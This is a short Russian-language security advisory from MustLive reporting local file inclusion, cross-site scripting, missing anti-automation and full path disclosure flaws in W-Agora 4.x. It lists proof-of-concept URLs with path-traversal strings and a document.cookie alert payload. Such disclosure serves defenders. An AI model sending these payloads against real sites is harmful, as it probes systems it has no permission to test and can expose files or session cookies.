Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Local File Inclusion, Insufficient Anti-automation, Cross-Site Scripting и Full path disclosure уязвимостях в
W-Agora.
Local File Inclusion (WASC-31):
http://site/register.php?bn=1 (в папке conf)
http://site/register.php?bn=..\1 (в любой папке - только на Windows-серверах)
Local File Inclusion (WASC-31):
Данная уязвимость работает в 4.0, но атака в Windows не работает в 4.2.1.
http://site/rss.php3?site=1 (в папке conf)
http://site/rss.php3?site=\..\1 (в любой папке - только на Windows-серверах)
Insufficient Anti-automation (WASC-21):
http://site/register.php?site=support
В форме нет защиты от автоматизированных запросов (капчи).
XSS (WASC-08):
http://site/register.php?bn=%3Cbody%20onload=alert(document.cookie)%3E
XSS (WASC-08):
Данная уязвимость работает в 4.0, но не работает в 4.2.1.
http://site/rss.php3?site=%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure (WASC-13):
Уязвимы W-Agora 4.2.1 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4858/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua